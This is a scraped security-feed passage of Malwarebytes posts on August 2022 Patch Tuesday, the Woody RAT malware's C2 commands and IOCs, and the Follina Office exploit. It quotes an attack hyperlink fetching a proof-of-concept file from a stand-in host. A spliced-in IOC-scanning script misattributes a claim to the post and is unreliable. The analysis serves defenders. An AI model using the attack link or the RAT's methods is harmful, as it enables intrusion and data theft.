Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[CVE-2022-24477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24477>): is a Microsoft Exchange Server Elevation of Privilege (EoP) vulnerability. 
Affected products are Microsoft Exchange Server 2016 CU 23, Microsoft Exchange Server 2019 CU 12, Microsoft Exchange Server 2019 CU 11, Microsoft Exchange Server 2016 CU 22, and Microsoft Exchange Server 2013 CU 23. Besides installing the update, administrators need to enable Extended Protection to prevent exploitation of this vulnerability. More details can be found on the [Exchange Team Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n[CVE-2022-24516](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24516>): is another Microsoft Exchange Server EoP vulnerability. Affected products are Microsoft Exchange Server 2016 CU 23, Microsoft Exchange Server 2019 CU 12, Microsoft Exchange Server 2013 CU 23, Microsoft Exchange Server 2019 CU 11, and Microsoft Exchange Server 2016 CU 22. Besides installing the update, administrators need to enable Extended Protection to prevent exploitation of this vulnerability. More details can be found on the [Exchange Team Blog](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>).\n\n## Windows Point-to-Point Protocol\n\n[CVE-2022-30133](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30133>): is a Windows Point-to-Point Protocol (PPP) RCE vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 9.8 out of 10. An unauthenticated attacker could send a specially crafted connection request to a remote access server (RAS), which could lead to remote code execution (RCE) on the RAS machine. This vulnerability can only be exploited by communicating via port 1723. 
As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port, which renders the vulnerability unexploitable.\n\n## Windows Network File System\n\n[CVE-2022-34715](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34715>): is a Windows Network File System (NFS) RCE vulnerability with a CVSS score of 9.8 out of 10. This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). This vulnerability is not exploitable in NFSv2.0 or NFSv3.0. Until you have installed the Windows update that addresses it, you can mitigate an attack by disabling NFSv4.1. This could adversely affect your environment and should only be used as a temporary mitigation.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are a few major ones that you may find in your environment.\n\n**Adobe** has also released security updates for many of its products, including Acrobat, Reader, Adobe Commerce, and Magento Open Source. 
More details [on the Adobe security site](<https://helpx.adobe.com/security.html>).\n\n**Cisco** released security updates for [numerous products](<https://tools.cisco.com/security/center/publicationListing.x>) this month.\n\n**Google** released [Android](<https://source.android.com/security/bulletin/2022-08-01>) security updates.\n\n**SAP **released 5 new [Security Notes](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>).\n\n**VMware **released Security Advisory [VMSA-2022-0022](<https://www.vmware.com/security/advisories/VMSA-2022-0022.html>) and [warned](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html#:~:text=2022%2D08%2D09%3A%20VMSA%2D2022%2D0021.1>) that a recently disclosed auth bypass flaw is [now actively exploited](<https://www.bleepingcomputer.com/news/security/vmware-warns-of-public-exploit-for-critical-auth-bypass-vulnerability/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T09:00:00", "type": "malwarebytes", "title": "Update now! 
Microsoft fixes two zero-days in August's Patch Tuesday", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-24477", "CVE-2022-24516", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35743"], "modified": "2022-08-10T09:00:00", "id": "MALWAREBYTES:1E762A45A948B3FD9F8A8DC65D028095", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-patch-tuesday-august-2022", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-08T14:51:13", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and, more recently, Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities and communication protocol.\n\n## Distribution methods\n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat were typically archived into a zip file pretending to be a document specific to a Russian group. 
When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure1.png>) Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has been weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The lure, written in Russian, is titled \"_Information security memo_\" and provides security practices for passwords, confidential information, etc.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure2.png>) Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information, including a PDB path, from which we picked a name for this new Rat:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure3.png>) Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. 
Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as the parameter.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure4.png>) main function\n\nAs we will see later, the malware uses multiple threads, so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request.\n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine-specific values. The values are taken from the adapter information, computer name and volume information, and the malware appends 8 random bytes to avoid any possible cookie collisions.\n\nA combination of the _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions is used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure5.png>) get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary; the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. 
Both the malware and the C2 then use these bytes to generate the AES-CBC key with _BCryptGenerateSymmetricKey_; that key is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure6.png>) RSA Encryption routine\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure7.png>) AES Encryption Routine\n\n### C2 HTTP endpoint requests\n\n**knock** \\- This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request whose body is the 32 random bytes from which the AES-CBC key is derived, RSA-4096 encrypted.\n\nThe response to this request is decrypted and contains the URL path (/submit) to which the malware submits the additional machine information it collects after this operation.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure8.png>) knock request headers\n\n**submit** \\- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. 
[Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** \\- The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with \"_CRY\" then the malware proceeds to send the knock request again but if the C2 responds with \"_ACK\" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. 
Note that all the communications involved in these commands are AES encrypted.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure9.png>) Command execution routine\n\n**_SET Commands**\n\n * **PING** \\- This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** \\- Unknown command\n * **EXIT** \\- Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute) - Executes the command received from the C2 by creating a cmd.exe process; the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then \"_DAT\" is appended to this data before it is AES encrypted and sent to the C2.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure10.png>) EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as a file.\n * **INFO** (Submit Information) - The INFO command is similar to the \"submit\" request above; it sends the same information to the C2 as the \"submit\" request.\n\n INFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of the UPLD and EXEC commands. The command first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with one difference: the process is executed directly instead of through cmd.exe as in the EXEC command. The command uses the named pipes in the same fashion as the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of the UPLD and PROC commands. 
The command receives the remote file using the UPLD command, then executes the file using the PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are: \n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command with multiple child commands, which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take a screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure12.png>) INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC, with the only difference being that the output of the process execution is not sent back to the C2. 
It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 to upload a file and then execute it using the DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware the ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET DLLs are loaded by the malware and commands are executed via the methods present in these DLLs:\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure13.png>) SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute a .NET assembly with arguments received from the C2. The code is received as an array of Base64 strings separated by the 0x20 (space) character.\n * **DN_D** (DotNet DLL) - This command gives the attacker more control over execution. An attacker can choose whether or not to send the console output back to the C2. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. 
The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure14.png>) Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. 
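The C2 domains, C2 IP, Follina HTML stage and Woody Rat download URL listed in the IOC section are the network artefacts a defender can hunt for. The script below is an added example and is not code from Malwarebytes or from the post: it refangs those IOCs and sweeps proxy log lines for them, reporting an exact URL match when host, port and path all agree and a host-level match otherwise, so a client that fetched a different path from a known stage host is still surfaced. The log lines are constructed for this example, and the space-separated layout (timestamp, client IP, method, URL, status) is an assumption rather than any product's format.

```python
"""Added example (not from the Malwarebytes post): sweep proxy logs for the
Woody Rat network IOCs. The indicators are copied, still defanged, from the
post's IOC list; the log lines are constructed and their space-separated
layout (timestamp, client IP, method, URL, status) is an assumption rather
than any product's format."""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

WOODY_RAT_IOCS = [
    "kurmakata.duckdns[.]org",
    "microsoft-ru-data[.]ru",
    "194.36.189.179",
    "microsoft-telemetry[.]ru",
    "oakrussia[.]ru",
    "garmandesar.duckdns[.]org:444/uoqiuwef.html",  # Follina HTML stage
    "fcloud.nciinform[.]ru/main.css",                 # Woody Rat download
]

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d+)$")


def refang(ioc: str) -> str:
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def normalize(ioc: str) -> Tuple[str, Optional[int], Optional[str]]:
    """(host, port, path) for a refanged IOC; path is None for bare hosts."""
    s = refang(ioc)
    if "://" not in s:
        s = "//" + s          # let urlsplit treat the leading token as netloc
    p = urlsplit(s)
    return (p.hostname or "").lower(), p.port, (p.path or None)


INDICATORS = [normalize(i) for i in WOODY_RAT_IOCS]


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def host_matches(log_host: str, ioc_host: str) -> bool:
    """Exact match for IPs; exact or subdomain match for domain names."""
    if _is_ip(ioc_host):
        return log_host == ioc_host
    return log_host == ioc_host or log_host.endswith("." + ioc_host)


def match_url(url: str) -> Optional[Tuple[str, str]]:
    """Strongest indicator for a URL: (ioc, "url") when host, port and path
    all match, (ioc, "host") when only the host does, None otherwise."""
    p = urlsplit(url)
    host = (p.hostname or "").lower()
    port = p.port or (443 if p.scheme == "https" else 80)
    candidates = []
    for ioc, (ihost, iport, ipath) in zip(WOODY_RAT_IOCS, INDICATORS):
        if not host_matches(host, ihost):
            continue
        exact = ipath is not None and (iport is None or iport == port) and p.path == ipath
        candidates.append((ioc, "url" if exact else "host"))
    if not candidates:
        return None
    return sorted(candidates, key=lambda c: c[1] != "url")[0]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue            # malformed line: skip rather than guess
        found = match_url(m["url"])
        if found:
            hits.append({"line": n, "ts": m["ts"], "client": m["client"],
                         "url": m["url"], "ioc": found[0], "match": found[1]})
    return hits


def hosts_to_triage(hits: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Client IP -> indicators it touched: the pivot for the IR queue."""
    out: Dict[str, List[str]] = {}
    for h in hits:
        out.setdefault(str(h["client"]), []).append(str(h["ioc"]))
    return out


# Constructed sample: one client walking the chain (Follina HTML, main.css,
# C2 by name, C2 by IP), one benign client that also touches a C2 host's
# subdomain, and one fetching a different path from the Follina host.
SAMPLE_LOG = """\
2022-08-01T10:14:55Z 10.0.0.12 GET http://garmandesar.duckdns.org:444/uoqiuwef.html 200
2022-08-01T10:15:02Z 10.0.0.12 GET http://fcloud.nciinform.ru/main.css 200
2022-08-01T10:15:40Z 10.0.0.12 POST http://microsoft-telemetry.ru/knock 200
2022-08-01T10:16:01Z 10.0.0.12 GET http://194.36.189.179/ping 200
2022-08-01T10:16:30Z 10.0.0.45 GET https://www.microsoft.com/en-us/ 200
2022-08-01T10:17:12Z 10.0.0.45 GET http://cdn.microsoft-ru-data.ru/update.bin 200
2022-08-01T10:18:00Z 10.0.0.77 GET http://garmandesar.duckdns.org/index.html 404
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(f"line {h['line']}: {h['client']} -> {h['ioc']} ({h['match']})")
    print(hosts_to_triage(scan(SAMPLE_LOG.splitlines())))
```

Host-level matches deserve the same triage as exact URL ones: the post notes that the actor rotates stages behind the same infrastructure (the Follina HTML and the `main.css` download are served from different hosts than the C2), so any contact with a listed host is worth a look even when the path is new.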
We also already detected the binary payloads via our heuristic malware engines.\n\n\n\n## IOCs\n\n**Woody****Rat**:\n\n * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0\n * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b\n * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a\n * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce\n * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e\n * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834\n * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80\n * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3\n * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css (edited)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:00:00", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:00:00", "id": "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "href": "https://www.malwarebytes.com/blog/news/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T17:32:49", "description": "_**Update: Please see our [FAQ](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/faq-mitigating-microsoft-offices-follina-zero-day/>) for the latest guidance and mitigation tips on Follina.**_\n\nOn Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) regarding the Microsoft Support Diagnostic Tool (MSDT) in Windows vulnerability.\n\nThe [mitigation](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) offered by Microsoft consists of an alternative method to unregister the MSDT URL Protocol. \nSeveral researchers have come across a novel attack that circumvents Microsoft's Protected View and anti-malware detection.\n\nThe attack vector uses the Word remote template feature to retrieve an HTML file from a remote webserver. It goes on to use the `ms-msdt` protocol URI scheme to load some code, and then execute some PowerShell.\n\nAll of the above methods are features, but if we tell you that put together this allows an attacker to remotely run code on your system by tricking you into clicking a link, that sounds quite disturbing doesn\u2019t it?\n\nWell, you'd be right to be concerned. 
That little sequence of features adds up to a zero-day flaw in Microsoft Office that is being abused in the wild to achieve arbitrary code execution on Windows systems. \n\nJerome Segura, Malwarebytes' Senior Director, Threat Intelligence:\n\n> This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros.\n\nThe most prominent researchers working on the issue have dubbed the vulnerability in Microsoft Office **Follina**, because a sample uploaded to VirusTotal included the area code for the Italian comune Follina.\n\nThe first researcher to find and report Follina used in the wild goes by the handle [@CrazymanArmy](<https://twitter.com/CrazymanArmy/status/1531120929321152512?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>). Our own analyst Hossein Jazi had also spotted the same maldoc, although at the time the remote template was down, leaving out a critical piece of the attack chain.\n\n> Our threat intel analyst [@h2jazi](<https://twitter.com/h2jazi?ref_src=twsrc%5Etfw>) had spotted a sample using the msdt.exe RCE back in April. \n \nAt the time, the remote template was already down and therefore full identification was not possible. <https://t.co/03UU2ClMhv>\n> \n> -- Malwarebytes Threat Intelligence (@MBThreatIntel) [May 30, 2022](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw>)\n\nIt was more recently made public again by [@nao_sec](<https://twitter.com/nao_sec/status/1530196847679401984?s=20&t=-Qqi0GkIHnH0kN46y8DL1w>).\n\n> Interesting maldoc was submitted from Belarus. 
It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.<https://t.co/hTdAfHOUx3> [pic.twitter.com/rVSb02ZTwt](<https://t.co/rVSb02ZTwt>)\n> \n> -- nao_sec (@nao_sec) [May 27, 2022](<https://twitter.com/nao_sec/status/1530196847679401984?ref_src=twsrc%5Etfw>)\n\n## Affected versions\n\nUnder normal circumstances, files from potentially unsafe locations are opened as read only or in Protected View. However, this protection can be easily bypassed by changing the document to a Rich Text Format (RTF) file. By doing so, the code can run without even opening the document, via the preview pane in Explorer.\n\nWhile the research is ongoing and the info security community is testing and probing, we are receiving some mixed signals about whether the latest, fully patched, version of Office 365 is vulnerable to this type of attack or not. Older versions are certainly vulnerable, which already makes it a problem with a huge attack surface.\n\nResearcher Kevin Beaumont [provides the example](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) where an attacker can send an email with this text as a hyperlink:\n \n \n ms-excel:ofv|u|https://blah.com/poc.xls\n\nOutlook will allow the user to click the hyperlink and open the Excel document. Because the document isn\u2019t attached to the email, and the URI doesn\u2019t start with http or https, most email gateways are going to let that slide straight through as nothing appears malicious.\n\nAs we stated earlier, even looking at a specially crafted file in the preview pane of Windows Explorer could trigger the attack. Microsoft has been made aware of the issues and the possible consequences. 
While its first reaction was that there was no security issue, it seems this needs to be fixed.\n\n## Mitigation\n\nThere are a few things you can do to stop some or all of the \u201cfeatures\u201d used in this type of attack.\n\n### Unregister the ms-msdt protocol\n\nWill Dormann, a vulnerability analyst at the CERT/CC has [published a registry fix](<https://gist.github.com/wdormann/031962b9d388c90a518d2551be58ead7>) that will unregister the ms-msdt protocol.\n\nCopy and paste the text into a notepad document:\n\n * Click on **File**, then **Save As\u2026**\n * Save it to your Desktop, then name the file `disable_ms-msdt.reg` in the file name box.\n * Click **Save**, and close the notepad document.\n * Double-click the file `disable_ms-msdt.reg` on your desktop.\n\nNote, if you are prompted by User Account Control, select **Yes** or **Allow** so the fix can continue.\n\n * A message will appear about adding information into the registry, click **Yes** when prompted\n * A prompt should appear that the information was added successfully\n\n### Disable preview in Windows Explorer\n\nIf you have the preview pane enabled, you can:\n\n * Open File Explorer.\n * Click on **View** Tab.\n * Click on **Preview Pane** to hide it.\n\nThe post [Microsoft Office zero-day "Follina"\u2014it\u2019s not a bug, it\u2019s a feature! 
(It's a bug)](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T18:09:26", "type": "malwarebytes", "title": "Microsoft Office zero-day \u201cFollina\u201d\u2014it\u2019s not a bug, it\u2019s a feature! (It\u2019s a bug)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-05-30T18:09:26", "id": "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T17:32:49", "description": "On Monday May 30, 2022, Microsoft issued [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) for a zero-day remote code vulnerability, 'Follina', already being exploited in the wild via malicious Word 
